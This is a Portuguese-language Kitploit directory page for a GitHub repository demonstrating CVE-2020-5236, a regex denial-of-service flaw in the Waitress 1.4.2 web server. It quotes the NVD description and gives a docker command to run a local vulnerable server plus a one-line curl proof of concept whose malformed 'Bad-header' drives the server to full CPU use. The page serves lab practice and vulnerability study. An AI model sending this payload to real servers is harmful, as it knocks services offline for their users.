Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-5236 — Waitress 1.4.2 ReDoS - CVE-2020-5236 (Código de Exemplo do Blog) | Kitploit
Ferramentas/GitHubGitHub/motikan2010/cve-2020-5236
Análise de VulnerabilidadesSegurança WebAprendizado e EducaçãoLabs e Prática
GitHubmotikan2010/cve-2020-5236

CVE-2020-5236

Waitress 1.4.2 ReDoS - CVE-2020-5236 (Código de Exemplo do Blog)

Ver Repositório
42há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

Waitress 1.4.2 ReDoS - CVE-2020-5236

A versão 1.4.2 do Waitress permite um ataque de DoS quando o Waitress recebe um cabeçalho que contém caracteres inválidos. Quando um cabeçalho como "Bad-header: xxxxxxxxxxxxxxx\x10" é recebido, isso faz com que o mecanismo de expressão regular retroceda catastroficamente, fazendo o processo usar 100% de tempo de CPU e bloqueando qualquer outra interação. Isso permite que um atacante envie uma única requisição com um cabeçalho inválido e derrube o serviço.

por NVD

Uso

Executar servidor vulnerável

root@kitploit:~
$ docker run --rm --name waitress -v "$PWD/src:/src" -p "8080:8080" -it python:3.7-slim python /src/server.py

PoC

root@kitploit:~
$ curl "http://127.0.0.1:8080/hello/hogefuga" -H "Bad-header: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx`echo -n '\x10'`"

Mostrar uso de cpu para o servidor. Execute "docker stats waitress".

↓ Executar PoC

Referências

  • NVD - CVE-2020-5236
  • Retrocesso catastrófico em regex permite negação de serviço · Aviso · Pylons/waitress
Baixar ferramenta